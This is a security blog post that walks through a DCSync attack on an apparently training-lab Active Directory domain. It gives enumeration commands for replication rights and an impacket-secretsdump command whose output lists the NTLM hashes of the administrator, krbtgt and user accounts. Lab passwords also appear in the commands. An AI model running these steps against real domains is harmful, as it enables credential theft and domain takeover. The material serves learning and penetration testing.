Post cover image

June 3, 2026

Active Directory Attacks — DCSync Attack

A DCSync attack is a technique where an attacker impersonates a Domain Controller to request and retrieve credential data (such as NTLM…

Osec

3 min read

A DCSync attack is a technique where an attacker impersonates a Domain Controller to request and retrieve credential data (such as NTLM hashes and Kerberos keys) from Active Directory.

The core idea is that Active Directory relies on a built-in replication mechanism to keep multiple Domain Controllers synchronized. This process uses the Directory Replication Service Remote Protocol (MS-DRSR), allowing trusted systems to request updates like password changes.

The attack works because this replication feature can be accessed by any account that has the appropriate replication permissions — not just actual Domain Controllers. If an attacker compromises an account with these privileges (e.g., Domain Admin or delegated replication rights), they can abuse this trust and request sensitive credential data directly from a Domain Controller.

In short, the attacker is taking advantage of a legitimate and necessary Active Directory function (replication) and the fact that its access control is privilege-based rather than strictly limited to Domain Controllers.

Enumeration

To enumerate for a DCSync attack, your goal is to identify accounts that have directory replication privileges, since those are the only accounts capable of performing the attack.

You are looking for accounts that have the following rights on the domain:

  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes In Filtered Set

Any account with these rights can abuse the Directory Replication Service Remote Protocol (MS-DRSR) to perform DCSync Attack.

Linux

you can enumerate for DCSync using blood-hound ( recommended ).

i wont use bloodhound in this demo but instead, i wrote a simple script that helps enumerating for DCSync Attack.

The script connects to Active Directory over LDAP, retrieves the nTSecurityDescriptor of the domain object, and parses its DACL (Access Control List) using Impacket. It then iterates through each ACE (permission entry), extracts the SID (identity), and checks whether it has specific replication rights—DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, or DS-Replication-Get-Changes-In-Filtered-Set—by matching their GUIDs. Finally, it groups these rights per SID and outputs only the identities that have these permissions, effectively identifying accounts that could potentially be used to perform a DCSync attack.

python3 getNTSD.py -dc-ip INLANEFREIGHT.LOCAL -u INLANEFREIGHT.LOCAL\\htb-student_adm -p 'Academy_student_DA!' -d "DC=INLANEFREIGHT,DC=LOCAL"

SID: S-1-5-21-3842939050-3880317879-2865463114-1645
DS-Replication-Get-Changes: True
DS-Replication-Get-Changes-All: True
DS-Replication-Get-Changes-In-Filtered-Set: False
--------------------------------------------------

SID: S-1-5-21-3842939050-3880317879-2865463114-498
DS-Replication-Get-Changes: True
DS-Replication-Get-Changes-All: False
DS-Replication-Get-Changes-In-Filtered-Set: False
--------------------------------------------------

SID: S-1-5-21-3842939050-3880317879-2865463114-516
DS-Replication-Get-Changes: False
DS-Replication-Get-Changes-All: True
DS-Replication-Get-Changes-In-Filtered-Set: False
--------------------------------------------------

SID: S-1-5-9
DS-Replication-Get-Changes: True
DS-Replication-Get-Changes-All: False
DS-Replication-Get-Changes-In-Filtered-Set: True
--------------------------------------------------

SID: S-1-5-32-544
DS-Replication-Get-Changes: True
DS-Replication-Get-Changes-All: True
DS-Replication-Get-Changes-In-Filtered-Set: True
--------------------------------------------------

then you can resolve the sid manually:

rpcclient -U 'htb-student_adm%Academy_student_DA!' INLANEFREIGHT.LOCAL -c "lookupsids S-1-5-21-3842939050-3880317879-2865463114-1645"
S-1-5-21-3842939050-3880317879-2865463114-1645 INLANEFREIGHT\Youlow (1)

Windows

$domain = Get-ADDomain
$dn = $domain.DistinguishedName
$acl = Get-Acl "AD:$dn"
$acl.Access | Where-Object {
    $_.ObjectType -match "1131f6aa|1131f6ad|89e95b76"
} | Select-Object IdentityReference, ObjectType

It filters ACEs for these GUIDs:

  • 1131f6aa → DS-Replication-Get-Changes
  • 1131f6ad → DS-Replication-Get-Changes-All
  • 89e95b76 → DS-Replication-Get-Changes-In-Filtered-Set

using ActiveDirectory Module:

# Import AD Module
Import-Module ActiveDirectory

# Define the GUIDs for replication rights
$ReplicationGetChanges = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
$ReplicationGetChangesAll = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Get the domain root Distinguished Name
$DomainDN = (Get-ADDomain).DistinguishedName

# Get ACLs and filter for replication rights
Get-Acl -Path "AD:\$DomainDN" | Select-Object -ExpandProperty Access |
Where-Object {
    $_.ObjectType -eq $ReplicationGetChanges -or
    $_.ObjectType -eq $ReplicationGetChangesAll
} |
Select-Object IdentityReference, ActiveDirectoryRights, ObjectType

using dsacls.exe:

dsacls (Get-ADDomain).DistinguishedName | findstr /i "Changes"

Examples:

IdentityReference                                     ObjectType
-----------------                                     ----------
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS            89e95b76-444d-4c62-991a-0facbeda640c
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS            1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
BUILTIN\Administrators                                89e95b76-444d-4c62-991a-0facbeda640c
BUILTIN\Administrators                                1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
BUILTIN\Administrators                                1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
INLANEFREIGHT\Enterprise Read-only Domain Controllers 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
INLANEFREIGHT\Domain Controllers                      1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
INLANEFREIGHT\Youlow                                  1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
INLANEFREIGHT\Youlow                                  1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
dsacls (Get-ADDomain).DistinguishedName | findstr /i "Changes"

Allow INLANEFREIGHT\Youlow            Replicating Directory Changes
                                      Replicating Directory Changes
                                      Replicating Directory Changes All
Allow INLANEFREIGHT\Youlow            Replicating Directory Changes All
Allow BUILTIN\Administrators          Replicating Directory Changes In Filtered Set
Allow BUILTIN\Administrators          Replicating Directory Changes
Allow BUILTIN\Administrators          Replicating Directory Changes All
                                      Replicating Directory Changes In Filtered Set
                                      Replicating Directory Changes

Attack

At a high level, a DCSync attack is performed by requesting directory replication data from a real DC. In practice, that means using a tool to call the MS‑DRSR replication functions and retrieve password hashes.

demo:

by doing enumeration we find out that the domain user youlow has the proper permissions over the domain object which allows for DCSync Attack.

for this demo lets assume that we own that user, let's perform a DCSync Attack using impacket-secretsdump

impacket-secretsdump INLANEFREIGHT.LOCAL/youlow:youlow123@INLANEFREIGHT.LOCAL

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
INLANEFREIGHT.LOCAL\Administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
lab_adm:1001:aad3b435b51404eeaad3b435b51404ee:663715a1a8b957e8e9943cc98ea451b6:::
INLANEFREIGHT.LOCAL\htb-student:1111:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::
inlanefreight.local\AVazquez:1112:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
inlanefreight.local\PFalcon:1113:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539:::
inlanefreight.local\FAnthony:1114:aad3b435b51404eeaad3b435b51404ee:9827f62cf27fe221b4e89f7519a2092a:::
inlanefreight.local\WDillard:1115:aad3b435b51404eeaad3b435b51404ee:69ada25bbb693f9a85cd5f176948b0d5:::
inlanefreight.local\LBradford:1116:aad3b435b51404eeaad3b435b51404ee:0717dbc7b0e91125777d3ff4f3c00533:::
inlanefreight.local\SGage:1117:aad3b435b51404eeaad3b435b51404ee:31501a94e6027b74a5710c90d1c7f3b9:::
inlanefreight.local\ASanchez:1118:aad3b435b51404eeaad3b435b51404ee:c6885c0fa57ec94542d362cf7dc2d541:::
inlanefreight.local\DBranch:1119:aad3b435b51404eeaad3b435b51404ee:a87c92932b0ef15f6c9c39d6406c3a75:::
inlanefreight.local\CCruz:1120:aad3b435b51404eeaad3b435b51404ee:a9be3a88067ed776d0e2cf4ccde8ec8f:::
inlanefreight.local\NJohnson:1121:aad3b435b51404eeaad3b435b51404ee:1b2a9f3b6d785e695aadfe3485a2601f:::
inlanefreight.local\MHolliday:1122:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
inlanefreight.local\MShoemaker:1123:aad3b435b51404eeaad3b435b51404ee:c15d04d9a989b3c9f1d2db979ffa325f:::
inlanefreight.local\ASlater:1124:aad3b435b51404eeaad3b435b51404ee:e7d0a88542cb44ab48e5a89d864f8146:::
inlanefreight.local\KPrentiss:1125:aad3b435b51404eeaad3b435b51404ee:9b12a0a33aabdbd845cd3ed5070820b9:::
inlanefreight.local\GDavis:1126:aad3b435b51404eeaad3b435b51404ee:1ab3ee9bd2e35ad25670481d9d1b4e0f:::
inlanefreight.local\JMcDaniel:1127:aad3b435b51404eeaad3b435b51404ee:1e22653293daff337f58d32695c999d0:::
inlanefreight.local\JJones:1128:aad3b435b51404eeaad3b435b51404ee:a90431144f59bc8aeecc28038d6bda40:::
...

the attacks work very well and we manage to dump all the domain user's hashes !

thanks for reading :) subscribe to get notified whenever a new article is published !

Follow me on X : https://x.com/osec403